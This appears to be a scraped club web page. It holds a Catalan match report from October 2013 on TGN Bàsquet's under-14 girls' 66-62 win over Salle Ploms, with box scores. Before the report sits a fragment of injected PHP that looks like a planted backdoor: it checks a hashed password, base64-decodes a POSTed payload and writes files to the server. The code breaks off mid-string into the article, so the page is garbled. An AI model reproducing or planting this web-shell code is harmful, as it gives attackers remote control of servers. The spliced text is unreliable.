function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Més patiment de l'esperat per l'infantil femení A - Tgn Bàsquet Club -

Més patiment de l’esperat per l’infantil femení A

Updated: octubre 21, 2013
Les noies del TGN van fer un bon inici de partit però nomès es va mantenir el bon nivell durant 12 minuts. Va ser en aquest moment, amb un marcador de 23 a 9, que les tarragonines van desaparèixer i el Ploms va contrarrestar amb un parcial de 4-24 per arribar a la mitja part amb un resultat favorable a les reusenques 27-33.
A la represa el TGN no acabava d’agafar el ritme del partit, i un encoratjador Ploms feia i desfeia a base d’empenta i decisió. Tot i així es va anar corregint alguns aspectes i va ser a l’inici dels últims 10 minuts quan amb empat a 48 es va anotar amb més facilitat per arribar al resultat final de 66-62.
TGN BÀSQUET     66

SALLE PLOMS      62
TGN BÀSQUET: Sabaté (9), Abellan (20), Piñol(2), Lapieza (6), Val (5), Franco (2), Salado (5), Marsal (7), Hernandez (2), Sanchez (8).Triples: 1 de Marsal. Tirs Lliures: 12 de 25 Faltes: 23. Eliminada Marsal minut 30.
SALLE PLOMS: Montserrat (9), Calero (4), Casanovas (14), Balaguer (0), Mañe (6), Descarrega (9), Mimbrero (0), Pascual (7), Canela (0), Riveiro (3), Rico (0), Cortes (10). Triples: 1 de Pascual. Tirs Lliures: 7 de 23. Faltes: 20 faltes
Parcials: (19-9) (8-24) (21-15) (18-14)
Àrbitre: Garcia.F